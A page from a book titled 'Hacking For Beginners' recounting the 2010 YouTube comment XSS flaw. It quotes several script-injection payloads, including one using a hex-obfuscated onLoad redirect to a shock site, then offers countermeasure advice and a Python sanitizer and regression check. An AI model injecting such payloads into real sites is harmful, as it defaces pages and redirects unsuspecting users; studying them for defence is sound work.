Hacking For Beginners – Manthan Desai, 2010

In its simple form, the user would put in a comment such as this one:

<script><h1><marquee><font color="red"><u>Ha-Ha – This text will scroll in red, on your screen</script>

In this particular attack, the keyword IF_HTML_FUNCTION? appears after the <script> tag, in the following way:

<Script>IF_HTML_FUNCTION? <h1><marquee><font color="red"><u>Ha-Ha – This text will scroll in red, on your screen<script>

Apart from this keyword, I also noticed that the <script> tag is not properly closed. This is probably what caused other scripts on the same page to stop functioning.

During the time YouTube was vulnerable, users began creating variants of the marquee script, one of which would redirect users to an infamous hacker web site, as can be seen below.

<script><BODY onLoad="var a = '\x68\x74\x74\x70\x3a\x2f\x2f' + '\x77\x77\x77\x2e' 'goatse' + '\x2efr';location.href = a;"

One thing to note about this attack script is that the IF_HTML_FUNCTION? keyword is missing, but the <script> tag is still not properly closed.

Videos emerged of other users experimenting with this newly discovered flaw. One user made a video of himself exploiting the following script, which has the effect of making the page black, except for the words *TEXT HERE*:

<script><h1><marquee style="position: absolute; top: 0px; 0px; left: 0px; z-index: 9999999; right: 0px; background-color: rgb(0, 0, 0);"><font style:="font-size:60px" color="red"><u style="">*TEXT HERE*<script>

Similar to the previous two examples, the <script> tag is not closed, and just like the example before this one, the IF_HTML_FUNCTION? keyword is missing.

By the time I got around to creating my own experiments, YouTube had already fixed the problem; they also very briefly, and without detail, admitted to the attack (Google acknowledges YouTube hack).

The fix was swift and effective, but it impeded me from carrying out further tests, so I was not able to determine what would happen if, for example, the tag was properly terminated.

Lessons Learned and Countermeasures

It is still not clear whether this attack existed for a long time but was never noticed, or whether it was a recently introduced bug; hopefully YouTube will explain to us how this XSS vulnerability was made possible.

My gut feeling is that a recent software update introduced this security hole; if this is the case, it reinforces what some security experts are saying: incorporate security testing in your QA process, preferably with automated tools such as vulnerability scanners. Security testing and vulnerability scanning are not exercises that are done once and then never again. They need to be re-done each time a software update is made to your web apps. In the case of YouTube, this is probably a daily exercise.
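The unclosed <script> tags noted above, and the advice to re-run security tests on every update, can be turned into a concrete check. The following is an added example, not code from the book or from YouTube: an allow-list comment sanitizer built on Python's standard html.parser, contrasted with a naive filter that only strips well-formed <script>...</script> pairs and therefore misses the unclosed-tag payloads. The allowed tag set, the looks_safe heuristic and the sample comments (modelled on the payloads quoted on this page) are assumptions.

```python
import html
import re
from html.parser import HTMLParser

# Assumption: comments may carry only these inline tags, and never any attribute.
ALLOWED_TAGS = {"b", "i", "u", "em", "strong"}

def naive_strip_script(comment: str) -> str:
    """Removes only well-formed <script>...</script> pairs: an unclosed tag survives."""
    return re.sub(r"(?is)<script>.*?</script>", "", comment)

class AllowListSanitizer(HTMLParser):
    """Tokenises the comment, re-emits allow-listed tags bare, escapes everything else."""
    def __init__(self):
        super().__init__()
        self.out = []
    def handle_starttag(self, tag, attrs):
        # Attributes are dropped wholesale, so onLoad= and style= never reach the page.
        self.out.append(f"<{tag}>" if tag in ALLOWED_TAGS
                        else html.escape(self.get_starttag_text()))
    def handle_endtag(self, tag):
        text = f"</{tag}>"
        self.out.append(text if tag in ALLOWED_TAGS else html.escape(text))
    def handle_data(self, data):
        # Script bodies (even those after an unclosed <script>) arrive here and get escaped.
        self.out.append(html.escape(data))

def sanitize_comment(comment: str) -> str:
    parser = AllowListSanitizer()
    parser.feed(comment)
    parser.close()
    return "".join(parser.out)

def looks_safe(rendered: str) -> bool:
    """Deploy-time regression heuristic: no live script/marquee/body tag or event handler."""
    return re.search(r"(?i)<\s*(script|marquee|body)\b|<[^>]*\bon\w+\s*=", rendered) is None

# Constructed sample comments modelled on the three payloads quoted on this page.
SAMPLE_COMMENTS = [
    '<script><h1><marquee><font color="red"><u>Ha-Ha, scrolling text</script>',
    '<Script>IF_HTML_FUNCTION? <h1><marquee><font color="red"><u>Ha-Ha<script>',
    '<script><BODY onLoad="location.href = a;"',
]

def regression_report(comments=SAMPLE_COMMENTS):
    """Maps each comment to (naive_filter_safe, allowlist_safe) for the QA run."""
    return {c: (looks_safe(naive_strip_script(c)), looks_safe(sanitize_comment(c)))
            for c in comments}
```

Run regression_report() as part of every deploy: the naive filter only passes the first, properly closed, payload, while the allow-list sanitizer neutralises all three.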

This attack is a stark reminder of how vulnerable Internet users are to XSS attacks. A classic and relatively simple attack worked against the biggest Internet giant. If Google and YouTube cannot keep their users safe, then who can?

“Warning! Do not use this attack again on YouTube and try to hack it, as they are back tracking this type of illegal activities; this is for educational purpose only”.

www.hackingtech.co.tv

Page 156